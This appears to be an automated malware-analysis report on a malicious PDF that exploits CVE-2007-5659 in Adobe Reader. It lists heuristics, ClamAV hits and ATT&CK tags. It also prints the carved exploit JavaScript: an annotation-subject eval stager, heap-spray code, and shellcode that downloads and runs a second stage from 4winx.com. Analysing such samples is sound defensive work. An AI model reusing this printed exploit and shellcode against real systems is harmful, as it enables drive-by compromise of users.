MALICIOUS
406
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF sample contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the embedded URL 'http://4winx.com/cgi-bin/rtm/n00a106201r0409R1a084c54X5afa01ddY016db0da'. The presence of multiple JavaScript exploit-related heuristics and the ML classifier's high confidence score support this assessment.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 11
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
JavaScript action low 5 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATEPDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPERPDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
-
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-35901
-
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGERPDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://4winx.com/cgi-bin/rtm/n00a106201r0409R1a084c54X5afa01ddY016db0da Referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d |
pdf-javascript-stream | PDF /JS object 9 at offset 0x3F4A | 469 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
fnc += 'l';
}
if (app.plugIns.length >= 2)
{
app[fnc]/**/(buf);
}
|
|||
annotation_subject_callee_hex_stage_000.js4064ab8a7831357befa55f27f40184d1ff72db49ccb2ba590f7dd8e747a7179e |
deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x1913 | 4997 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var X_nhO1i = new Array();var Vv__w256SS = 0;var Gb_Sl_LPe = "";function d__WB34c_B_Y_2(xBn_4_1_sQq4, L4B_M7_d){var s6__CqL_j = L4B_M7_d.toString();var V7uDn_UOvnMPcYB = "";for(var wS_0G2mT = 0; wS_0G2mT < s6__CqL_j.length; wS_0G2mT++) {var DC4bfQ = parseInt(s6__CqL_j.substr(wS_0G2mT, 1));if (!isNaN(DC4bfQ)) {DC4bfQ = DC4bfQ.toString(16);if (DC4bfQ.length == 1) { DC4bfQ = "0" + DC4bfQ; }else if (DC4bfQ.length != 2) { DC4bfQ = "00"; }V7uDn_UOvnMPcYB = DC4bfQ + V7uDn_UOvnMPcYB;if (V7uDn_UOvnMPcYB.length == 8) {break;}}}while(V7uDn_UOvnMPcYB.length < 8) { V7uDn_UOvnMPcYB = "0" + V7uDn_UOvnMPcYB; }var c680l__12 = xBn_4_1_sQq4.toString(16);if (c680l__12.length == 1) { c680l__12 = "0" + c680l__12; }else if (c680l__12.length != 2) { c680l__12 = "00"; }V7uDn_UOvnMPcYB = "3" + c680l__12 + "P" + V7uDn_UOvnMPcYB;return V7uDn_UOvnMPcYB;}function sNIR_5_C(k_0e__qR, tHI__t_8_iN){var H6___a = new Array("");var DI1_I_381y = k_0e__qR;var XEU3W_Q_4Ri5;if ((XEU3W_Q_4Ri5 = k_0e__qR.lastIndexOf("%u00")) != -1) {if (XEU3W_Q_4Ri5 + 6 == k_0e__qR.length) {H6___a[0] = k_0e__qR.substr(XEU3W_Q_4Ri5 + 4, 2);DI1_I_381y = k_0e__qR.substring(0, XEU3W_Q_4Ri5);}}XEU3W_Q_4Ri5 = 1;for (wS_0G2mT = 0; wS_0G2mT < tHI__t_8_iN.length; wS_0G2mT++) {var y__n4_V_73 = tHI__t_8_iN.charCodeAt(wS_0G2mT).toString(16);if (y__n4_V_73.length == 1) { y__n4_V_73 = "0" + y__n4_V_73; }H6___a[XEU3W_Q_4Ri5] = y__n4_V_73;XEU3W_Q_4Ri5++;}wS_0G2mT = H6___a[0].length ? 0 : 1;H6___a[XEU3W_Q_4Ri5] = "00";H6___a[XEU3W_Q_4Ri5 + 1] = "00";XEU3W_Q_4Ri5 += 2;if ((H6___a.length - wS_0G2mT) % 2) {H6___a[XEU3W_Q_4Ri5] = "00";}while(wS_0G2mT < H6___a.length) {DI1_I_381y += "%u" + H6___a[wS_0G2mT + 1] + H6___a[wS_0G2mT];wS_0G2mT += 2;}DI1_I_381y += "%u0000";return DI1_I_381y;}function bU_e8_w(D0_LoWIw, yaj_O__6E3_5l){while (D0_LoWIw.length*2<yaj_O__6E3_5l) {D0_LoWIw += D0_LoWIw;}D0_LoWIw = D0_LoWIw.substring(0,yaj_O__6E3_5l/2);return D0_LoWIw;}function U_4CO__2yj(YqRe_t, q6E__8__4v38x_2, txV34n){var w_j2_i = 0x0c0c0c0c;var D0_LoWIw = unescape(q6E__8__4v38x_2);var tHI__t_8_iN = d__WB34c_B_Y_2(YqRe_t, txV34n);var ds1GR0qnl = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var k_0e__qR = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4670%u4758%u0069%u7468%u7074%u2f3a%u342f%u6977%u786e%u632e%u6d6f%u632f%u6967%u622d%u6e69%u722f%u6d74%u6e2f%u3030%u3161%u3630%u3032%u7231%u3430%u3930%u3152%u3061%u3438%u3563%u5834%u6135%u6166%u3130%u6464%u3059%u3631%u6264%u6430%u0061";app.Cn310d = unescape(sNIR_5_C(k_0e__qR, tHI__t_8_iN));var tH_QnntEjckB1f = 0x400000;var P_EV_h = ds1GR0qnl.length * 2;var yaj_O__6E3_5l = tH_QnntEjckB1f - (P_EV_h+0x38);D0_LoWIw = bU_e8_w(D0_LoWIw, yaj_O__6E3_5l);var m__5__C_6_D = (w_j2_i - 0x400000)/tH_QnntEjckB1f;for (var D5GV6_o1_____v5 = 0; D5GV6_o1_____v5 < m__5__C_6_D; D5GV6_o1_____v5++) {X_nhO1i[D5GV6_o1_____v5] = D0_LoWIw + ds1GR0qnl;}}function R2lRMh6(){var AG7WY_D = "";for (wS_0G2mT = 0; wS_0G2mT < 12; wS_0G2mT++) {AG7WY_D += unescape("%u0c0c%u0c0c");}var S5____013__wMA = "";for (wS_0G2mT = 0; wS_0G2mT < 750; wS_0G2mT++) {S5____013__wMA += AG7WY_D;}this.collabStore = Collab.collectEm
... (truncated)
|
|||
legacy_pdfkit_stage_000.jsdccb25fa8538e77b815260e170d09045bdf14247b6c60c5174492216338adbeb |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1967 | 11271 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function w1ycb_bitcu0c(J0dG7l, P_4ME5_Dj6_i){var ML3j_6_d3c__tg = 512;var d_8M28_q0BGd = 2;var g_3652 = 0;var R5_JaE_7_7 = 0;var xOOE_eIBD = "";var bGBY4f0F_n___Wy = "";var b81M_m = 0;var X3u_Ry1 = 6 + 1;try {var WTSPD_32_7_q = 0;if (app) {R5_JaE_7_7 = R5_JaE_7_7 + 2;P_4ME5_Dj6_i = pr[WTSPD_32_7_q].subject;}} catch(e) { }R5_JaE_7_7 = R5_JaE_7_7 + 7;var kYbE_W = new Array();if (!J0dG7l) { kYbE_W = new Array(179,20,7,169,243,163);} else {kYbE_W = J0dG7l;}var o0_Ei12Q_Dul = 0;var J_dq___uq = 0;var sS_mV3 = 0;X3u_Ry1--;if (X3u_Ry1 == 0) {} else {for(J_dq___uq = 0; J_dq___uq < P_4ME5_Dj6_i.length; J_dq___uq += d_8M28_q0BGd) {if (o0_Ei12Q_Dul >= X3u_Ry1) {o0_Ei12Q_Dul = 0;}var QfRV0u2v5M_bR = P_4ME5_Dj6_i.substr(J_dq___uq, d_8M28_q0BGd) + 'XXZ';var g___M13Q = parseInt(QfRV0u2v5M_bR, 19 + d_8M28_q0BGd);g___M13Q -= kYbE_W[o0_Ei12Q_Dul] * (sS_mV3 + d_8M28_q0BGd);o0_Ei12Q_Dul++;if (g___M13Q < 0) {g___M13Q = String.fromCharCode(g___M13Q - (Math.floor(g___M13Q/256))*256);} else {g___M13Q = String.fromCharCode(g___M13Q);}if (R5_JaE_7_7 == 9) {xOOE_eIBD += g___M13Q;} else if (R5_JaE_7_7 == 8) {xOOE_eIBD += H67hE_JYO;} else {if (R5_JaE_7_7 != 9) {xOOE_eIBD += J_dq___uq;}}sS_mV3++;}}var l6Uf_A_v_5 = this;l6Uf_A_v_5['ev'+'al'](xOOE_eIBD);}
w1ycb_bitcu0c(0, "aa7a6g540aa20617725b9g4j073dac7b6f2f2j110c6i320j43432g68b5ab8e0a3e5h7g949a33524gc27bai8c5k5kba7i11349h4872586993ak440k0k5h0eag1f0c19bj9a4a399ab2ac315a2a4d6h1e6a7e20c2605i2177b2ak29957g99113i1dbi0d23afc28d044k1j029k7b3a0g2f0k84776g35859838516j0d88ai04c1902aa8876g0ec39612a322be3k4342a714945k7h2b75a6688i0k6e6c6b2hb19e8d752i2dbi2ab6758i8j165ja4434ha16137067e2j894e96476291447j27682d5k03a45e5j66360k08bk8g57bh7k373d1e258d8g61101h3f5945a863593d244ha98c7i249ec3142k981g3a9f237hc12j27aj4231b8baai838h710ja17h5f0c4b4hbb4049bda54cc2bgc2561j8bc35f007i8ebac35569a71a0789be4f0175c2746j22b8bg4ha128c1147a76891gbe3jb9706fa6ad853e7g567g6h9k9j0683212jc12a0i60933i44ab1h7i850k755d6d72438j698a5c440b9e80178i426a761b909h5c525e3k44281abe132k6f1810aj9g71123j3e649j7f6b4k03c25aa2b86k169643397fb6083j595k1b2f1j0426883d13c1a79gac0a52ab8c9j17658g0d154a188c7d979f6c283ha9989338727hc37k28ah7j191i7a30a9adb246afa1841k4e868e5d6e4h7j6c79bh30630gbf8ja9b6785b0k6489ah0g212j6i4gad1c715c6iag60561d4841803d855fa264452cae15ab50140iac3j1h5ba4bb33040433435k2e2j245d247e74b67g22bk60af5i9d3h792e91a0963j1h0j1i3a053a02973b9i2f0b5b8d6j3j58294c2h775j53ac9d4k8820721b7d231c7ea5125jac351i0ba7ae7d374a0c876k4c5f0a2jbh4k5cb26361b8351h0c078b89969e526kaja546ae429fac9a3c86652kbh6g917699bb4d5i871f10565k862cbc48ah817k1h006a3k8046796k699g0g30317b8c0k04631k53af68225eaf3e3a316i1c52b72a5c5i12477g81bb8c18c28ca54ha60363389faabbbi1c14304628c30k20549g42005h157i62941b22a6a6847d0kbd5ga25701067e3604b1270b6b45570k129jbdb24f6e7881b2927h0k8eac746e9j5j89720c4900bfa76d14412f940c9i851h652g4c7h3h0692602i6ca0749ea44i556682004g7d7i5c5f23a48i46b10d602kai3h770j7409286b6daiaf64684a249718995k5gbe7k5255a818752i7a8g043j3a1h9j460d2f09029h7c4j369gb21c3h5k355f544f7f69181640630f6i229g1c8h7gba1j59b87j2604bf27bd22701902b68d0j1i68bj80454g4676b7385355a766bcc3407d4100b6851ja886a8772fbg365d0283bi665c98526i7742940k5a5a6142829k92802d16b046b48975bc1e89b06e6b91560826710h5h838a1j3a8e508h144h557c2a0557865d1ia310a2ba4ea2b5506d1c3c66987a123f2e5d6ha1713k3cag1a98094a0b6gbhbk225g0e2k9h2b857f332fa7421f0402a55f92a11i0i4k50031c1ba2061ab57e4j92031524328bbd8jad4a93ahbi4fa19dbe9bc0bf4jbc7g27a68j291eaa2f6f5k2a1j7667952bbi441a988jb2b69h3da0715k60ajbkbe7h0e561k3ab74i841e198420465g05542b63573g996g85982jad67bc3k7j5f8b7321919h5j5i524b442i4k1h33376e1b1095bb7i075c3b54ac8e7b8911bg6e27329d17a3422j78b6224i3863b2ak0004bh676k4b218e94bcbg5gad6h7a16574gag1554168cajb70b30452k05aj60184gbh0a9j560ib3471faa21a1a4ae5iafa99e331i4cae5g6a2i83799f221h50058c9j0024ag5b2d82780da4212k7d1g7hbd632883b16e4h16886e6c5b7e6471685339aab8c35k16bj0g3d274e9a8j109h3i45346d5b654d562k757dbc4c1d8c207c549b07443dbea9bj0h32bk1i21b20100aa4ka140274i6850042hb1137360a3700k131cb82090ag6hadc353829k26891aai21bf1a9k467828b5814k70a2659e464ib26d6ja224190ha5899ha70a1d55b677747a498c1i8i3c9068522488a34092aa3879653b103e6d584024187c6355270e543c885775a47d66b0304c58a
... (truncated)
|
|||
deobfuscated.jsc8f53b6fdf1de04209485f5f0c971794166d559fd3261decdf64ec3bc7df6880 |
deobfuscated-js | PDF JavaScript deobfuscation pass | 93141 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
aa7a6g540aa20617725b9g4j073dac7b6f2f2j110c6i320j43432g68b5ab8e0a3e5h7g949a33524gc27bai8c5k5kba7i11349h4872586993ak440k0k5h0eag1f0c19bj9a4a399ab2ac315a2a4d6h1e6a7e20c2605i2177b2ak29957g99113i1dbi0d23afc28d044k1j029k7b3a0g2f0k84776g35859838516j0d88ai04c1902aa8876g0ec39612a322be3k4342a714945k7h2b75a6688i0k6e6c6b2hb19e8d752i2dbi2ab6758i8j165ja4434ha16137067e2j894e96476291447j27682d5k03a45e5j66360k08bk8g57bh7k373d1e258d8g61101h3f5945a863593d244ha98c7i249ec3142k981g3a9f237hc12j27aj4231b8baai838h710ja17h5f0c4b4hbb4049bda54cc2bgc2561j8bc35f007i8ebac35569a71a0789be4f0175c2746j22b8bg4ha128c1147a76891gbe3jb9706fa6ad853e7g567g6h9k9j0683212jc12a0i60933i44ab1h7i850k755d6d72438j698a5c440b9e80178i426a761b909h5c525e3k44281abe132k6f1810aj9g71123j3e649j7f6b4k03c25aa2b86k169643397fb6083j595k1b2f1j0426883d13c1a79gac0a52ab8c9j17658g0d154a188c7d979f6c283ha9989338727hc37k28ah7j191i7a30a9adb246afa1841k4e868e5d6e4h7j6c79bh30630gbf8ja9b6785b0k6489ah0g212j6i4gad1c715c6iag60561d4841803d855fa264452cae15ab50140iac3j1h5ba4bb33040433435k2e2j245d247e74b67g22bk60af5i9d3h792e91a0963j1h0j1i3a053a02973b9i2f0b5b8d6j3j58294c2h775j53ac9d4k8820721b7d231c7ea5125jac351i0ba7ae7d374a0c876k4c5f0a2jbh4k5cb26361b8351h0c078b89969e526kaja546ae429fac9a3c86652kbh6g917699bb4d5i871f10565k862cbc48ah817k1h006a3k8046796k699g0g30317b8c0k04631k53af68225eaf3e3a316i1c52b72a5c5i12477g81bb8c18c28ca54ha60363389faabbbi1c14304628c30k20549g42005h157i62941b22a6a6847d0kbd5ga25701067e3604b1270b6b45570k129jbdb24f6e7881b2927h0k8eac746e9j5j89720c4900bfa76d14412f940c9i851h652g4c7h3h0692602i6ca0749ea44i556682004g7d7i5c5f23a48i46b10d602kai3h770j7409286b6daiaf64684a249718995k5gbe7k5255a818752i7a8g043j3a1h9j460d2f09029h7c4j369gb21c3h5k355f544f7f69181640630f6i229g1c8h7gba1j59b87j2604bf27bd22701902b68d0j1i68bj80454g4676b7385355a766bcc3407d4100b6851ja886a8772fbg365d0283bi665c98526i7742940k5a5a6142829k92802d16b046b48975bc1e89b06e6b91560826710h5h838a1j3a8e508h144h557c2a0557865d1ia310a2ba4ea2b5506d1c3c66987a123f2e5d6ha1713k3cag1a98094a0b6gbhbk225g0e2k9h2b857f332fa7421f0402a55f92a11i0i4k50031c1ba2061ab57e4j92031524328bbd8jad4a93ahbi4fa19dbe9bc0bf4jbc7g27a68j291eaa2f6f5k2a1j7667952bbi441a988jb2b69h3da0715k60ajbkbe7h0e561k3ab74i841e198420465g05542b63573g996g85982jad67bc3k7j5f8b7321919h5j5i524b442i4k1h33376e1b1095bb7i075c3b54ac8e7b8911bg6e27329d17a3422j78b6224i3863b2ak0004bh676k4b218e94bcbg5gad6h7a16574gag1554168cajb70b30452k05aj60184gbh0a9j560ib3471faa21a1a4ae5iafa99e331i4cae5g6a2i83799f221h50058c9j0024ag5b2d82780da4212k7d1g7hbd632883b16e4h16886e6c5b7e6471685339aab8c35k16bj0g3d274e9a8j109h3i45346d5b654d562k757dbc4c1d8c207c549b07443dbea9bj0h32bk1i21b20100aa4ka140274i6850042hb1137360a3700k131cb82090ag6hadc353829k26891aai21bf1a9k467828b5814k70a2659e464ib26d6ja224190ha5899ha70a1d55b677747a498c1i8i3c9068522488a34092aa3879653b103e6d584024187c6355270e543c885775a47d66b0304c58ab2h295d1g2j0d645157b337422a39313faf2a60591j169e5j16a93dbc889j5gbk117868bk0b04214b242f352db89dbk2k914b0d6ic07c5a87114g8c9a929i0g0f7da6420baa6i2kbf851k904b05201f1h8d0f0f61943kaeaja89e1379b1545i9c76717k1g732cbd9970ai2b4d831i955j2j7628459e4k967048707d0h7iadak8b746f4jb83d7f4e2c7135a8bi6g1i3d6b5b095h850k92aj3e3g60bh9a502e3fc265bd8c4g330d824a4ha64e515j5ia1992g1h35860cc009b7adb4963a3168b01e3b5i3a595d0g9i640kb660522178bi7c515b569ia533b1bkacaaa6bbabb7703602aj954dc3569c5k526b5f468i082i838k6h7iag0jad5ab6aa7k1h05b4b18g26b72e4d18ac038a37962k9d8e365a2742673g5b918d6j800f1jad178j8g7599165ja4467c7a31040e3e12897k935k70c0278g0d4f5d6b33a75b6f6823282k1kbd4i13b95g779j47838g7eaa2f4i26567b5i3h400h3712933f409g2f27478f2640ak2dah8f29bib7854g101kb04h6i8g060i6268ba2b5ea53j3f2g9e7b0795b62g418dc381aa6h8b8c9j2591742e9k7e1k5c977g19ak8f3d2jaa1i8228141j7059a016b97eb09g7a7ja680709k757c529e8kb15c2f502552128a8i4e4jb7527i88206k523b43170c8fak83530197912f81596b7gb27b9c355f554c452i54a61a3f8j314g94bf9a0f783i6jb6aj93893h2i58091e7j159i643655102d463f6b06211d44bc517a1hc2bebh8c035gah917bak717ga51h49400c979hae5k2h690ebb9j018jah228h5617732f0c852g8d0b7h5g7ga5692j1i8e9d753a3h719c83383j693k8c6k8233ac8h27867a0f07bd455e299j295j5873a28h2fbd8c6e662k5a829a721f478abeb85f2013a2651e496a9bb700344g587c2939 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.